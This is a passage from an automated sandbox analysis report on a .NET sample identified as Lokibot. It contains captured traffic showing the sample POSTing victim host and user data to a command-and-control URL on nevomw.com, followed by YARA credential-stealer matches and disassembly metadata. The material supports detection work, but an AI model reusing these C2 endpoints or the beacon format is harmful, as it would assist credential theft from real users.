                                            Dec 2, 2020 11:53:28.211191893 CET | 1365 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:28.285478115 CET | 1367 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            97 | 192.168.2.6 | 49837 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:28.578865051 CET | 1368 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:28.633028030 CET | 1369 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:28.707381010 CET | 1373 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            98 | 192.168.2.6 | 49838 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:28.995225906 CET | 1381 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:29.048046112 CET | 1381 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:29.124566078 CET | 1383 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            99 | 192.168.2.6 | 49840 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:29.419858932 CET | 1385 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:29.472934961 CET | 1385 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:29.546129942 CET | 1390 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            System Behavior

                                            General

                                            Start time: 11:52:28
                                            Start date: 02/12/2020
                                            Path: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Wow64 process (32bit): true
                                            Commandline: 'C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe'
                                            Imagebase: 0xec0000
                                            File size: 667648 bytes
                                            MD5 hash: 2AAA15E28835FEDA9A2E223D82DB2126
                                            Has elevated privileges: true
                                            Has administrator privileges: true
                                            Programmed in: .Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time: 11:52:38
                                            Start date: 02/12/2020
                                            Path: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Wow64 process (32bit): true
                                            Commandline: {path}
                                            Imagebase: 0x8e0000
                                            File size: 667648 bytes
                                            MD5 hash: 2AAA15E28835FEDA9A2E223D82DB2126
                                            Has elevated privileges: true
                                            Has administrator privileges: true
                                            Programmed in: C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.480912778.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.607799523.0000000000E68000.00000004.00000020.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.476321253.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.452594690.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.549778212.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.546020230.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.414092067.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.491795139.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.562835408.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.563787570.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.481769783.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.474650127.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.477261856.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.529649981.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.480003007.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.485355648.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.479061979.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.446798245.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.450970355.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.490732616.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.446675906.0000000000E7D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.519148526.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.472912647.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.565557733.0000000000E7D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.517673183.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.396032754.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.560853517.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.419428408.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.535977726.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.486325651.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.493532930.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.533197865.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.420351505.0000000000E7D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.532205941.0000000000E84000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.416818180.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.489824103.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.450013817.0000000000E7C000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.488133602.0000000000E85000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Disassembly

                                            Code Analysis

                                              Executed Functions

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 034d15d052c367e68a6da97dbb2c68f14ab33922f246caa539e255b077115e18
                                              • Instruction ID: 43d45b86b58e187a7c06b2f4403f2625458cf8aedfc0cc8b2147107b080b77cd
                                              • Opcode Fuzzy Hash: 034d15d052c367e68a6da97dbb2c68f14ab33922f246caa539e255b077115e18
                                              • Instruction Fuzzy Hash: 9C22E2B4915258DFDB64DF64C858BECBBB1BF4A304F208199D419AB361CB70AE85CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 017BB6F0
                                              • GetCurrentThread.KERNEL32 ref: 017BB72D
                                              • GetCurrentProcess.KERNEL32 ref: 017BB76A
                                              • GetCurrentThreadId.KERNEL32 ref: 017BB7C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 7fb4d70b69028441e4398169b2d253a2bd5ba2f53adb3a16c9266e56f844f872
                                              • Instruction ID: 709b626f7c6bd3eaed8673a34022889238a650f4a607cbc1466939a43f36cc62
                                              • Opcode Fuzzy Hash: 7fb4d70b69028441e4398169b2d253a2bd5ba2f53adb3a16c9266e56f844f872
                                              • Instruction Fuzzy Hash: 855154B49046488FDB14CFA9D588BDEFBF1FF48314F24846AE519A7250C774A888CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 017BB6F0
                                              • GetCurrentThread.KERNEL32 ref: 017BB72D
                                              • GetCurrentProcess.KERNEL32 ref: 017BB76A
                                              • GetCurrentThreadId.KERNEL32 ref: 017BB7C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 10c161236580c7579b04dd3c6767e75aa1a1511c8552bddc54d60b17f31f89da
                                              • Instruction ID: fdca4f975e55dc3965340f96880980ff480044802c04b1760b10b614d497ac01
                                              • Opcode Fuzzy Hash: 10c161236580c7579b04dd3c6767e75aa1a1511c8552bddc54d60b17f31f89da
                                              • Instruction Fuzzy Hash: 955153B49046488FEB14CFA9D588BDEFBF0EF48314F24846AE519A7250D774A888CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: )9H$r&'
                                              • API String ID: 0-4283692356
                                              • Opcode ID: b0c1c3cdc223af56bd1218ec9d294f3351119ba0070ebf86224dc034923b5606
                                              • Instruction ID: 13e1b48bc24a2576b9d59dc7373e8c562e65428c216575b0fa6bb6491b9dc878
                                              • Opcode Fuzzy Hash: b0c1c3cdc223af56bd1218ec9d294f3351119ba0070ebf86224dc034923b5606
                                              • Instruction Fuzzy Hash: DB5168B9E00219DFCB04CFA9D8409EEBBB2FF89310F10856AD415AB754DB35AD46CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 017B98D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 7db5d508229258835cd18d191a4a050c0bc79ac699e244971fe79b4af622850c
                                              • Instruction ID: e0239cc40035c41413f1f034d98461c1bbbae42211e9dfe28648f444e7684314
                                              • Opcode Fuzzy Hash: 7db5d508229258835cd18d191a4a050c0bc79ac699e244971fe79b4af622850c
                                              • Instruction Fuzzy Hash: B27133B0A00B058FD764DF2AD184B9AFBF5FF88218F008929D65AD7B44DB34E9458F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017BFE0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 6f606cd194bd9614aeb37ae028597a956e2a2a24d0b179cbc8232cc246dc9247
                                              • Instruction ID: 73bec4b789bdb10141798b99bf18b1714bbe75fe2863cd6d182dbb1d31d06c29
                                              • Opcode Fuzzy Hash: 6f606cd194bd9614aeb37ae028597a956e2a2a24d0b179cbc8232cc246dc9247
                                              • Instruction Fuzzy Hash: EF51CFB1D00309DFDB14CFA9C984ADEFBB5BF48710F24812AE819AB214D7749985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017BFE0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: f5514632e83abbbedb30f76c78f17c242e1c979cec0c666e1e7bee808bf445c2
                                              • Instruction ID: 0373abdab6d2a3aaca1ad6e6ec7ab9732838e5fc063903f2837ef932fce8847a
                                              • Opcode Fuzzy Hash: f5514632e83abbbedb30f76c78f17c242e1c979cec0c666e1e7bee808bf445c2
                                              • Instruction Fuzzy Hash: 9E41CFB1D003099FDB14CFA9C984ADEFFB5BF48714F24822AE819AB214D7749985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 017B5421
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 686b45687bc7aa3e736508e9aeffcd8b97bd1bb49961d95606b55e0fb578552a
                                              • Instruction ID: 0d823334f7dc07520f6b4f62e02344dacf17504a3241aa9161ca3a10984d1708
                                              • Opcode Fuzzy Hash: 686b45687bc7aa3e736508e9aeffcd8b97bd1bb49961d95606b55e0fb578552a
                                              • Instruction Fuzzy Hash: A641CF70D0465CCEDB25CFA9C984BCEFBB5BF49308F248069D508AB251DBB96985CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 017B5421
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 46e6572ff5cd6befec8002760f08d2a5179170cdc8989fe889d46707ebf438a6
                                              • Instruction ID: 34adfe2a83bc637bf20f82a9064e4ce26e50c7653bfba341dc66fd13313184f7
                                              • Opcode Fuzzy Hash: 46e6572ff5cd6befec8002760f08d2a5179170cdc8989fe889d46707ebf438a6
                                              • Instruction Fuzzy Hash: 6E41E270D04618CFDB24CFA9C984BCEFBB1BF48308F248069D508AB255DB755986CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetSystemMetrics.USER32(0000004B), ref: 017B8205
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID:
                                              • API String ID: 4116985748-0
                                              • Opcode ID: 05127df86c44a64ab9f940d84b00943e0c88859d67fb23f873dc0d9861401885
                                              • Instruction ID: 827991c466cceeb56e51177e039b9a38c1c76c7e237b4fac00265ac07448df1a
                                              • Opcode Fuzzy Hash: 05127df86c44a64ab9f940d84b00943e0c88859d67fb23f873dc0d9861401885
                                              • Instruction Fuzzy Hash: 5E312571906384CFEB21DF69D4883EABFF8EB54354F18806DD444A3285C7389985CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017BB93F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: e8066fe91bc420e0e23c70791ee0188e658906ad64c4534f59da82873634fa34
                                              • Instruction ID: 0174a8e70530b71c79ba1f24d242064be766934fc51d13fa4633d0c258eb31fb
                                              • Opcode Fuzzy Hash: e8066fe91bc420e0e23c70791ee0188e658906ad64c4534f59da82873634fa34
                                              • Instruction Fuzzy Hash: 7C21DFB5905219EFDB10CFA9D984AEEBBF4FB48320F14842AE954A3210D374A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017BB93F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: c997a7caa71d2ee6f30a54ae910ae6d4fc7bb7a1e7041961a39083a7ac8a6237
                                              • Instruction ID: 1aa458ad48a2fb2b5579c65cce9a0290c191d77509056c82639306faba842a5c
                                              • Opcode Fuzzy Hash: c997a7caa71d2ee6f30a54ae910ae6d4fc7bb7a1e7041961a39083a7ac8a6237
                                              • Instruction Fuzzy Hash: 6621E2B59042099FDB10CFA9D984BDEFBF8FB48320F14841AE914A3310D374A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017B9951,00000800,00000000,00000000), ref: 017B9B62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 9137b3099708b30ddf75564edc7259c48b6a2d2b5b2e31014c060f666459efa8
                                              • Instruction ID: 039ef34ea3f509385b1852df90048c89ad5c1e818941a80acf86cc632eee0306
                                              • Opcode Fuzzy Hash: 9137b3099708b30ddf75564edc7259c48b6a2d2b5b2e31014c060f666459efa8
                                              • Instruction Fuzzy Hash: C91114B69043498FDB10CF9AC584BDEFBF4EB48314F10852AEA25A7200C374A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017B9951,00000800,00000000,00000000), ref: 017B9B62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 9bd78f557d2a7cb1178f4de530658cf4ff78df25c53b1458bc2707087bf82a6b
                                              • Instruction ID: caf7e3028afd946ccd734ecec2c11f9af23835de9a1c217370b29f3202d1d1a7
                                              • Opcode Fuzzy Hash: 9bd78f557d2a7cb1178f4de530658cf4ff78df25c53b1458bc2707087bf82a6b
                                              • Instruction Fuzzy Hash: 6F21F2B69002098FDB10CFAAC484BEEFBB4EB88314F14852AD929A7200C374A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetWindowLongW.USER32(?,?,?), ref: 017BFF9D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              • Opcode ID: de266bd45e898d18e5a4c5df33b1c091248d414754e38d6fb5597fcf7706a1d6
                                              • Instruction ID: 1936b606ebbaa6fe63d7bba5028ce11f50ad657271da134e9b248358b81d99bb
                                              • Opcode Fuzzy Hash: de266bd45e898d18e5a4c5df33b1c091248d414754e38d6fb5597fcf7706a1d6
                                              • Instruction Fuzzy Hash: 5411F2B58043099FDB10DF99D989BDEFBF8EB49724F20845AE954A3340C374A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 017B98D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 13ae85114c90b6e6290a13328e9abd601fd68c6048c272da6729590a78ca5966
                                              • Instruction ID: 96e6669538246848f4c7c29422e837c05e6a30fcf1d27e40e1f65f31ea04527d
                                              • Opcode Fuzzy Hash: 13ae85114c90b6e6290a13328e9abd601fd68c6048c272da6729590a78ca5966
                                              • Instruction Fuzzy Hash: AD11D2B5C006498FDB10CF9AD444BDEFBF4EB89324F14852AD929B7600D375A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetWindowLongW.USER32(?,?,?), ref: 017BFF9D
                                              Memory Dump Source
